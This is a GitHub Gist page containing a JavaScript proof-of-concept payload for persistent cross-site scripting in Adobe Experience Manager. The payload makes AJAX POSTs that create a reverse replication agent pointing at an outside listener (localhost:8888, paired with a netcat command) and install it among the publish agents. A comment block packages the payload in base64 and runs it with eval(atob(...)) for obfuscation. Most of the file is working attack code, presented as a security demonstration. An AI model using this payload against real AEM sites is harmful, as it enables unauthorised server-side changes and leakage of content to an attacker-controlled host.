Last active
July 3, 2019 13:30
-
-
Save thomashartm/9a8b85aaea8f69959994621cbd62f427 to your computer and use it in GitHub Desktop.
Demonstration payload for persistent XSS in AEM to generate reverse replication agent that interacts with a fake AEM server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * The following snippet will call it's AEM backend and create a reverse replication agent communicating with | |
| * http://localhost:8888/reverseagent | |
| * Use base64 btoa and eval(atob(...)) to package it and unpackage and execute it | |
| * To demonstrate the aem system issuing the requests run: | |
| * netcat -nvlp 8888 to | |
| */ | |
| $.ajax({url: '/content/rce/portal-to-toom',type: 'POST', data: {'jcr:primaryType':'cq:Page'}}); | |
| setTimeout(function(){ | |
| $.ajax({url: '/content/rce/portal-to-toom/_jcr_content',type: 'POST', data: {'jcr:primaryType': 'nt:unstructured','jcr:title': 'reverse-agent','enabled': 'true','transportUri': 'http://localhost:8888/reverseagent','transportUser': 'admin','reverseReplication': true,'cq:template': '/libs/cq/replication/templates/revagent','retryDelay': '5000','sling:resourceType': 'cq/replication/components/revagent','transportPassword': '{25a0084936aae0469c1e8464fe1d75a3bd36f65a9d2c40628239eb3c2cc04972}'}}); | |
| setTimeout(function(){ | |
| $.ajax({url: '/content/rce/portal-to-toom',type: 'POST', data: {':dest':'/etc/replication/agents.publish/portal-to-doom', ':operation':'copy', ':replace':'true'}}); | |
| },3000)} | |
| , 3000); | |
| /* | |
| Use base64 to package and unpackage it | |
| btoa("$.ajax({url: '/content/rce/portal-to-toom',type: 'POST', data: {'jcr:primaryType':'cq:Page'}});setTimeout(function(){$.ajax({url: '/content/rce/portal-to-toom/_jcr_content',type: 'POST', data: {'jcr:primaryType': 'nt:unstructured','jcr:title': 'reverse-agent','enabled': 'true','transportUri': 'http://localhost:8888/reverseagent','transportUser': 'admin','reverseReplication': true,'cq:template': '/libs/cq/replication/templates/revagent','retryDelay': '5000','sling:resourceType': 'cq/replication/components/revagent','transportPassword': '{25a0084936aae0469c1e8464fe1d75a3bd36f65a9d2c40628239eb3c2cc04972}'}});setTimeout(function(){$.ajax({url: '/content/rce/portal-to-toom',type: 'POST', data: {':dest':'/etc/replication/agents.publish/portal-to-doom', ':operation':'copy', ':replace':'true'}});},3000)}, 3000);") | |
| eval(atob("JC5hamF4KHt1cmw6ICcvY29udGVudC9yY2UvcG9ydGFsLXRvLXRvb20nLHR5cGU6ICdQT1NUJywgZGF0YTogeydqY3I6cHJpbWFyeVR5cGUnOidjcTpQYWdlJ319KTtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7JC5hamF4KHt1cmw6ICcvY29udGVudC9yY2UvcG9ydGFsLXRvLXRvb20vX2pjcl9jb250ZW50Jyx0eXBlOiAnUE9TVCcsIGRhdGE6IHsnamNyOnByaW1hcnlUeXBlJzogJ250OnVuc3RydWN0dXJlZCcsJ2pjcjp0aXRsZSc6ICdyZXZlcnNlLWFnZW50JywnZW5hYmxlZCc6ICd0cnVlJywndHJhbnNwb3J0VXJpJzogJ2h0dHA6Ly9sb2NhbGhvc3Q6ODg4OC9yZXZlcnNlYWdlbnQnLCd0cmFuc3BvcnRVc2VyJzogJ2FkbWluJywncmV2ZXJzZVJlcGxpY2F0aW9uJzogdHJ1ZSwnY3E6dGVtcGxhdGUnOiAnL2xpYnMvY3EvcmVwbGljYXRpb24vdGVtcGxhdGVzL3JldmFnZW50JywncmV0cnlEZWxheSc6ICc1MDAwJywnc2xpbmc6cmVzb3VyY2VUeXBlJzogJ2NxL3JlcGxpY2F0aW9uL2NvbXBvbmVudHMvcmV2YWdlbnQnLCd0cmFuc3BvcnRQYXNzd29yZCc6ICd7MjVhMDA4NDkzNmFhZTA0NjljMWU4NDY0ZmUxZDc1YTNiZDM2ZjY1YTlkMmM0MDYyODIzOWViM2MyY2MwNDk3Mn0nfX0pO3NldFRpbWVvdXQoZnVuY3Rpb24oKXskLmFqYXgoe3VybDogJy9jb250ZW50L3JjZS9wb3J0YWwtdG8tdG9vbScsdHlwZTogJ1BPU1QnLCBkYXRhOiB7JzpkZXN0JzonL2V0Yy9yZXBsaWNhdGlvbi9hZ2VudHMucHVibGlzaC9wb3J0YWwtdG8tZG9vbScsICc6b3BlcmF0aW9uJzonY29weScsICc6cmVwbGFjZSc6J3RydWUnfX0pO30sMzAwMCl9LCAzMDAwKTs=")) | |
| */ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment